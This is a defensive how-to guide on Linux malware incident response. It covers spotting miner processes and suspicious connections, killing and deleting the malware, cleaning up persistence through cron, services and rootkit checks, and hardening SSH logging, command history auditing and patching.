Master Linux Incident Response: Detect, Remove, and Harden Malware Infections

01 Identify Phenomena

Start by observing abnormal host behavior and checking system metrics and security alerts to spot potential malware activity.

CPU usage : Run top and sort processes by CPU usage. Processes with >70% CPU and suspicious names are likely miners.

Process inspection : Use ps -aux to view command lines; look for unusual URLs or downloader strings.

Security gateway alerts : Correlate alerts with host activity to pinpoint processes communicating with C&C servers.

Network monitoring : Continuously watch connections to suspicious IPs with: while true; do netstat -antp | grep [ip]; done If the threat uses a domain, add a bogus entry to /etc/hosts to redirect the domain and then monitor the associated process. Historical commands : Search the command history for malicious entries using history .

02 Remove Virus

After identifying the malicious process, terminate it and delete its executable.

Kill process chain :

ps -elf | grep [pid]
kill -9 [pid]

Delete virus file :

ls -al /proc/[pid]/exe
rm -f [exe_path]

03 Close Loop (Persistence Cleanup)

Ensure the malware cannot re‑establish itself.

Check scheduled tasks :

crontab -l

cat /etc/anacrontab

Inspect services : service --status-all Detect hijacked system files (modified within the last week):

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 | xargs ls -la

Search for malicious drivers : lsmod Install and run chkrootkit or rkhunter for rootkit detection. Monitor suspicious processes with lsof -p [pid] and strace -tt -T -e trace=all -p $pid .

04 System Hardening

Strengthen the host to prevent future infections, especially web‑based attacks.

Fix weak SSH passwords : Review login logs:

grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

Identify brute‑force sources:

grep "Failed password" /var/log/secure | grep -Eo "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq -c

Enable command auditing : Increase history size and record IP and timestamps.

sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile
USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')
if [ "$USER_IP" = "" ]; then USER_IP=$(hostname); fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"
source /etc/profile

Apply common web vulnerability patches : Update services and apply fixes for known exploits such as structs2, ThinkPHP, Redis unauthorized access, Confluence CVE‑2019‑3396, Drupal CVE‑2018‑7600, etc.

Linux servers are frequently targeted by botnet worms and cryptominers; maintaining strong passwords, regular patching, and diligent incident response are essential to keep systems secure.